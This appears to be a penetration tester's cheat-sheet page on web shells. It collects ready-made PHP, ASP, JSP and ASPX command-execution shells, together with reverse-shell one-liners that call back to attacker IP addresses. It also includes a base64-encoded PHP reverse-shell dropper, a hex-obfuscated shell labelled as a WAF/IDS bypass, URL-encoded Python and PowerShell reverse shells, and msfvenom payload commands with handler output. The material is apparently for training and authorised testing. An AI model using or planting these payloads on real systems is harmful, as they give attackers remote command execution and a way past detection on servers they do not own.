Web Shell

References

Web Shells 101 Using PHP (Web Shells Part 2) | AcunetixAcunetix

Oneliner shell - Cheat sheet0xSs0rZ

Bind and Reverse Shell

Reverse Shell Cheat Sheetpentestmonkey

Tools

Onelin3r

GitHub - D4Vinci/One-Lin3r: Gives you one-liners that aids in penetration testing operations, privilege escalation and moreGitHub

pip install one-lin3r

LazyShell

GitHub - aniqfakhrul/LazyShell: Script to generate reverse shellsGitHub

Webroot

Web Server

Default Webroot

Apache

/var/www/html/

Nginx

/usr/local/nginx/html/

IIS

c:\inetpub\wwwroot|

XAMPP

C:\xampp\htdocs|

Custom shells

PHP

Linux

<?php system($_REQUEST['cmd']); ?>

http://SERVER_IP:PORT/uploads/shell.php?cmd=id

<?php system($_GET['cmd']);?>

<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>

Windows

<?php echo exec($_GET["cmd"]);?>

Reverse shell - Linux

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1'"); ?>

php -r '$s=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$s=fsockopen("<IP>",<PORT>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$s=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'

php -r '$s=fsockopen("<IP>",<PORT>);system("/bin/sh -i <&3 >&3 2>&3");'

php -r '$s=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

With Base 64 - Decode, change IP PORT, encode, change payload

<!DOCTYPE html><html><head><title>PHP Code with HTML</title></head><body><?php $tem1 = base64_decode("PD9waHAKc2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokaXAgPSAnMTkyLjE2OC4xLjgnOwokcG9ydCA9IDQ0MzsKJGNodW5rX3NpemUgPSAxNDAwOwokd3JpdGVfYSA9IG51bGw7CiRlcnJvcl9hID0gbnVsbDsKJHNoZWxsID0gJ3VuYW1lIC1hOyB3OyBpZDsgL2Jpbi9zaCAtaSc7CiRkYWVtb24gPSAwOwokZGVidWcgPSAwOwppZiAoZnVuY3Rpb25fZXhpc3RzKCdwY250bF9mb3JrJykpIHsKCSRwaWQgPSBwY250bF9mb3JrKCk7CglpZiAoJHBpZCA9PSAtMSkgewoJCXByaW50aXQoIkVSUk9SOiBDYW4ndCBmb3JrIik7CgkJZXhpdCgxKTsKCX0KCWlmICgkcGlkKSB7CgkJZXhpdCgwKTsgIC8vIFBhcmVudCBleGl0cwoJfQoJaWYgKHBvc2l4X3NldHNpZCgpID09IC0xKSB7CgkJcHJpbnRpdCgiRXJyb3I6IENhbid0IHNldHNpZCgpIik7CgkJZXhpdCgxKTsKCX0KCSRkYWVtb24gPSAxOwp9IGVsc2UgewoJcHJpbnRpdCgiV0FSTklORzogRmFpbGVkIHRvIGRhZW1vbmlzZS4gIFRoaXMgaXMgcXVpdGUgY29tbW9uIGFuZCBub3QgZmF0YWwuIik7Cn0KY2hkaXIoIi8iKTsKdW1hc2soMCk7CiRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOwppZiAoISRzb2NrKSB7CglwcmludGl0KCIkZXJyc3RyICgkZXJybm8pIik7CglleGl0KDEpOwp9CiRkZXNjcmlwdG9yc3BlYyA9IGFycmF5KAogICAwID0+IGFycmF5KCJwaXBlIiwgInIiKSwgIC8vIHN0ZGluIGlzIGEgcGlwZSB0aGF0IHRoZSBjaGlsZCB3aWxsIHJlYWQgZnJvbQogICAxID0+IGFycmF5KCJwaXBlIiwgInciKSwgIC8vIHN0ZG91dCBpcyBhIHBpcGUgdGhhdCB0aGUgY2hpbGQgd2lsbCB3cml0ZSB0bwogICAyID0+IGFycmF5KCJwaXBlIiwgInciKSAgIC8vIHN0ZGVyciBpcyBhIHBpcGUgdGhhdCB0aGUgY2hpbGQgd2lsbCB3cml0ZSB0bwopOwokcHJvY2VzcyA9IHByb2Nfb3Blbigkc2hlbGwsICRkZXNjcmlwdG9yc3BlYywgJHBpcGVzKTsKaWYgKCFpc19yZXNvdXJjZSgkcHJvY2VzcykpIHsKCXByaW50aXQoIkVSUk9SOiBDYW4ndCBzcGF3biBzaGVsbCIpOwoJZXhpdCgxKTsKfQpzdHJlYW1fc2V0X2Jsb2NraW5nKCRwaXBlc1swXSwgMCk7CnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLCAwKTsKc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMl0sIDApOwpzdHJlYW1fc2V0X2Jsb2NraW5nKCRzb2NrLCAwKTsKcHJpbnRpdCgiU3VjY2Vzc2Z1bGx5IG9wZW5lZCByZXZlcnNlIHNoZWxsIHRvICRpcDokcG9ydCIpOwp3aGlsZSAoMSkgewoJLy8gQ2hlY2sgZm9yIGVuZCBvZiBUQ1AgY29ubmVjdGlvbgoJaWYgKGZlb2YoJHNvY2spKSB7CgkJcHJpbnRpdCgiRVJST1I6IFNoZWxsIGNvbm5lY3Rpb24gdGVybWluYXRlZCIpOwoJCWJyZWFrOwoJfQoJaWYgKGZlb2YoJHBpcGVzWzFdKSkgewoJCXByaW50aXQoIkVSUk9SOiBTaGVsbCBwcm9jZXNzIHRlcm1pbmF0ZWQiKTsKCQlicmVhazsKCX0KCSRyZWFkX2EgPSBhcnJheSgkc29jaywgJHBpcGVzWzFdLCAkcGlwZXNbMl0pOwoJJG51bV9jaGFuZ2VkX3NvY2tldHMgPSBzdHJlYW1fc2VsZWN0KCRyZWFkX2EsICR3cml0ZV9hLCAkZXJyb3JfYSwgbnVsbCk7CglpZiAoaW5fYXJyYXkoJHNvY2ssICRyZWFkX2EpKSB7CgkJaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSyBSRUFEIik7CgkJJGlucHV0ID0gZnJlYWQoJHNvY2ssICRjaHVua19zaXplKTsKCQlpZiAoJGRlYnVnKSBwcmludGl0KCJTT0NLOiAkaW5wdXQiKTsKCQlmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOwoJfQoJaWYgKGluX2FycmF5KCRwaXBlc1sxXSwgJHJlYWRfYSkpIHsKCQlpZiAoJGRlYnVnKSBwcmludGl0KCJTVERPVVQgUkVBRCIpOwoJCSRpbnB1dCA9IGZyZWFkKCRwaXBlc1sxXSwgJGNodW5rX3NpemUpOwoJCWlmICgkZGVidWcpIHByaW50aXQoIlNURE9VVDogJGlucHV0Iik7CgkJZndyaXRlKCRzb2NrLCAkaW5wdXQpOwoJfQoJaWYgKGluX2FycmF5KCRwaXBlc1syXSwgJHJlYWRfYSkpIHsKCQlpZiAoJGRlYnVnKSBwcmludGl0KCJTVERFUlIgUkVBRCIpOwoJCSRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOwoJCWlmICgkZGVidWcpIHByaW50aXQoIlNUREVSUjogJGlucHV0Iik7CgkJZndyaXRlKCRzb2NrLCAkaW5wdXQpOwoJfQp9CmZjbG9zZSgkc29jayk7CmZjbG9zZSgkcGlwZXNbMF0pOwpmY2xvc2UoJHBpcGVzWzFdKTsKZmNsb3NlKCRwaXBlc1syXSk7CnByb2NfY2xvc2UoJHByb2Nlc3MpOwpmdW5jdGlvbiBwcmludGl0ICgkc3RyaW5nKSB7CglpZiAoISRkYWVtb24pIHsKCQlwcmludCAiJHN0cmluZ1xuIjsKCX0KfQo/PiA="); $file = fopen("php1.php", "w"); echo fwrite($file, $tem1); fclose($file); ?></body></html>

Ref: https://x.com/bountywriteups/status/1844330355450331235?t=mPxG2Tz49KPkkRSK6fIoXA&s=03

Or upload simple shell and use rs oneliner, for example:

Bind and Reverse Shell

with python (Linux)

10.10.10.185/images/blank.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.90%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

with powershell (Windows)

?cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22

PHP - Bypass IDS / WAF

<?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>

Hex decode:

if($x_=$_GET[0]){system($x_);}

ASP

<% eval request('cmd') %>

With msfvenom

msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php

Webshells collection

GitHub - TheBinitGhimire/Web-Shells: Some of the best web shells that you might need!GitHub

SecLists Webshells

ls /opt/seclists/Web-Shells/        
backdoor_list.txt  CFM  FuzzDB  JSP  laudanum-1.0  Magento  PHP  Vtiger  WordPress

Laudanum repo

Web-Shells/laudanum at master · jbarcia/Web-ShellsGitHub

cp /opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx .

Modify the shell for use

PHP

[Apr 08, 2024 - 03:50:25 (EDT)] exegol-CPTS /workspace # locate cmd.php
/opt/seclists/Web-Shells/FuzzDB/cmd.php

[Apr 08, 2024 - 03:51:51 (EDT)] exegol-CPTS /workspace # locate shell.php 
/opt/seclists/Web-Shells/PHP/another-obfuscated-phpshell.php
/opt/seclists/Web-Shells/PHP/obfuscated-phpshell.php
/opt/seclists/Web-Shells/WordPress/plugin-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/shell.php

<?php system($_REQUEST["cmd"]); ?>


echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php

?cmd=id

curl http://SERVER_IP:PORT/shell.php?cmd=id

GitHub - duck-sec/webshell: My PHP webshellGitHub

p0wny shell

Automate the bypass of php functions restriction (as system, etc.)

Works on Linux and Windows

GitHub - flozz/p0wny-shell: Single-file PHP shellGitHub

JSP

[Apr 08, 2024 - 03:50:32 (EDT)] exegol-CPTS /workspace # locate cmd.jsp
/opt/seclists/Web-Shells/FuzzDB/cmd.jsp
/opt/seclists/Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp
/opt/tools/SSRFmap/data/cmd.jsp
/opt/tools/clusterd/src/lib/resources/cmd.jsp

Apr 08, 2024 - 03:52:01 (EDT)] exegol-CPTS /workspace # locate shell.jsp
/opt/seclists/Web-Shells/JSP/simple-shell.jsp

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

ASP

[Apr 08, 2024 - 03:51:48 (EDT)] exegol-CPTS /workspace # locate shell.asp 
/opt/seclists/Web-Shells/laudanum-1.0/asp/shell.asp

<% eval request("cmd") %>

https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/asp/newaspcmd.aspraw.githubusercontent.com

ASPX

[Apr 08, 2024 - 03:49:48 (EDT)] exegol-CPTS /workspace # locate cmd.aspx
/opt/seclists/Web-Shells/FuzzDB/cmd.aspx

[Apr 08, 2024 - 03:51:08 (EDT)] exegol-CPTS /workspace # locate shell.aspx
/opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx

Metasploit

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2819 bytes

msf6 exploit(multi/handler) > set LHOST 10.10.14.5

LHOST => 10.10.14.5


msf6 exploit(multi/handler) > set LPORT 1337

LPORT => 1337


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.5:1337

Laudanum repo

Webshell9

Success!webshell9.com

Antak WebShell

nishang/Antak-WebShell at master · samratashok/nishangGitHub

Modify the shell for use

SharPyShell - Tiny and obfuscated ASP.NET webshell

GitHub - antonioCoco/SharPyShell: SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applicationsGitHub

  python3 SharPyShell.py generate -p somepassword

  python3 SharPyShell.py interact -u <http://target.url/sharpyshell.aspx> -p somepassword

redteamrecipe.com is for sale! Check it out on ExpiredDomains.comExpiredDomains.com

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=443 -f war > shell.war

msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war

msf6 exploit(multi/handler)

GitHub - guinea-offensive-security/JSB0HELL: A JSP-based web shell for CTF challenges, enabling command execution, file upload/download, and directory navigation on Java-based web servers like Apache Tomcat. Designed for educational use in authorized environments only.GitHub

Tomcat (8080)

Page not found - HackTricksbook.hacktricks.xyz

Awesome-RCE-techniques/Frameworks/Apache-Tomcat at master · p0dalirius/Awesome-RCE-techniquesGitHub

GitHub - p0dalirius/Tomcat-webshell-application: A webshell application and interactive shell for pentesting Apache Tomcat servers.GitHub

Release 1.3.0 - Added api in JSP + minor improvements · p0dalirius/Tomcat-webshell-applicationGitHub

Shell ++

TTY Upgrade

PreviousShells NextBind and Reverse Shell

Last updated 6 months ago

References

Tools

Onelin3r

LazyShell

Webroot

Custom shells

PHP

Linux

Windows

Reverse shell - Linux

PHP - Bypass IDS / WAF

ASP

With msfvenom

Webshells collection

SecLists Webshells

Laudanum repo

PHP

p0wny shell

PHPBash

wwwolf's PHP web shell

C99 Webshell

PentestMonkey - Reverse shell

JSP

ASP

ASPX

Metasploit

Laudanum repo

Webshell9

Antak WebShell

SharPyShell - Tiny and obfuscated ASP.NET webshell

WAR

Tomcat (8080)

Shell ++